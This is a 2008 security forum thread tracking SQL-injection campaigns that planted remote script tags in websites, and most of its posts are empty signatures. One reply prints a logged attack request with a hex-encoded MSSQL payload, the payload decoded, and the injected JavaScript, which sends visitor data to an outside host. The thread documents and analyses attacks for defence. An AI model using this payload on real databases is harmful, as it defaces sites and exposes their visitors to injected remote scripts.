Author Topic: SQL Injected jscript sites  (Read 72965 times)

0 Members and 1 Guest are viewing this topic.


July 08, 2008, 04:27:17 pm
Reply #61

YanceySlide

  • Jr. Member

  • Offline
  • **

  • 31
    • The Shadowserver Foundation
The Shadowserver Foundation

July 08, 2008, 04:34:14 pm
Reply #62

YanceySlide

  • Jr. Member

  • Offline
  • **

  • 31
    • The Shadowserver Foundation
The Shadowserver Foundation

July 08, 2008, 09:05:59 pm
Reply #63

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964


July 09, 2008, 05:22:38 pm
Reply #65

YanceySlide

  • Jr. Member

  • Offline
  • **

  • 31
    • The Shadowserver Foundation
The Shadowserver Foundation

July 11, 2008, 03:26:16 pm
Reply #66

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964

July 14, 2008, 02:27:48 pm
Reply #67

YanceySlide

  • Jr. Member

  • Offline
  • **

  • 31
    • The Shadowserver Foundation
Only one new one (for now):
www.gitporg.com
The Shadowserver Foundation

July 14, 2008, 02:53:12 pm
Reply #68

YanceySlide

  • Jr. Member

  • Offline
  • **

  • 31
    • The Shadowserver Foundation
The Shadowserver Foundation

July 14, 2008, 07:41:24 pm
Reply #69

YanceySlide

  • Jr. Member

  • Offline
  • **

  • 31
    • The Shadowserver Foundation
The Shadowserver Foundation

July 15, 2008, 12:25:17 pm
Reply #70

YanceySlide

  • Jr. Member

  • Offline
  • **

  • 31
    • The Shadowserver Foundation
The Shadowserver Foundation

July 15, 2008, 07:36:31 pm
Reply #71

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964

July 16, 2008, 03:31:13 pm
Reply #72

spamislame

  • Newbie

  • Offline
  • *

  • 3
I noticed a couple things about these attacks now that a domain I control was recently hit with a variety of exploits (fortunately it's secure against all of them.)

- They only try one type of exploit at a time, and they only attempt it once.
- They use a different ip address for each attempt that they make, indicating that it's a distributed attack and seemingly automated.

The first attack attempted to exploit HORDE, a web mail client, using an outdated and assumedly unpatched version.

All other attacks (three so far) have focused on unpatched or outdated installs of WordPress.

The IP's appear to all be home internet accounts using cable or DSL connections, indicating that the storm infection is behind it (previously discussed, I am sure.)

fyi, if it helps.

SiL

July 17, 2008, 04:06:01 pm
Reply #73

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
Our log entry
Code: [Select]
***.***.***.*** - - [17/Jul/2008:08:13:32 +0000] "GET /forums/index.php?act=attach&type=post&id=125;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A732E75736572732E35312E6C612F323031363232322E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F6A732E75736572732E35312E6C612F323031363232322E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" (malwarebytes.org) "-"
Decoded
Code: [Select]
DECLARE @S CHAR(4000);SET @S=CAST (DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://js.users.51.la/2016222.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://js.users.51.la/2016222.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor) AS CHAR(4000));EXEC(@S);

The link, js.users.51.la/2016222.js gives us
Code: [Select]
document.write ('<a href="http://www.51.la/?2016222" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');
// A Popular Free Statistics Service for 100 000+ Webmasters.
window.onerror=function(){return true};
document.write ('<script>var a6222tf="51la";var a6222pu="";var a6222pf="51la";var a6222su=window.location;var a6222sf=document.referrer;var a6222of="";var a6222op="";var a6222ops=1;var a6222ot=1;var a6222d=new Date();var a6222color="";if (navigator.appName=="Netscape"){a6222color=screen.pixelDepth;} else {a6222color=screen.colorDepth;}<\/script><script>a6222tf=top.document.referrer;<\/script><script>a6222pu =window.parent.location;<\/script><script>a6222pf=window.parent.document.referrer;<\/script><script>a6222ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a6222ops=(a6222ops==null)?1: (parseInt(unescape((a6222ops)[2]))+1);var a6222oe =new Date();a6222oe.setTime(a6222oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a6222ops+ ";path=/;expires="+a6222oe.toGMTString();a6222ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a6222ot==null){a6222ot=1;}else{a6222ot=parseInt(unescape((a6222ot)[2])); a6222ot=(a6222ops==1)?(a6222ot+1):(a6222ot);}a6222oe.setTime(a6222oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a6222ot+";path=/;expires="+a6222oe.toGMTString();<\/script><script>a6222of=a6222sf;if(a6222pf!=="51la"){a6222of=a6222pf;}if(a6222tf!=="51la"){a6222of=a6222tf;}a6222op=a6222pu;try{lainframe}catch(e){a6222op=a6222su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=20&id=2016222&tpages=\'+a6222ops+\'&ttimes=\'+a6222ot+\'&tzone=\'+(0-a6222d.getTimezoneOffset()/60)+\'&tcolor=\'+a6222color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a6222of)+\'&vpage=\'+escape(a6222op)+\'" \/>\');<\/script>');

The link in the above code, www.51.la/?2016222  gives us what looks like an automated regestration script
Code: [Select]
  <li><a href="reg.asp"></a></li>
  <li><a href="login.asp">¼</a></li>
Malware analysised using clarified analyzer to record and document how malware behaves in a networking environment

July 17, 2008, 04:22:47 pm
Reply #74

YanceySlide

  • Jr. Member

  • Offline
  • **

  • 31
    • The Shadowserver Foundation
The Shadowserver Foundation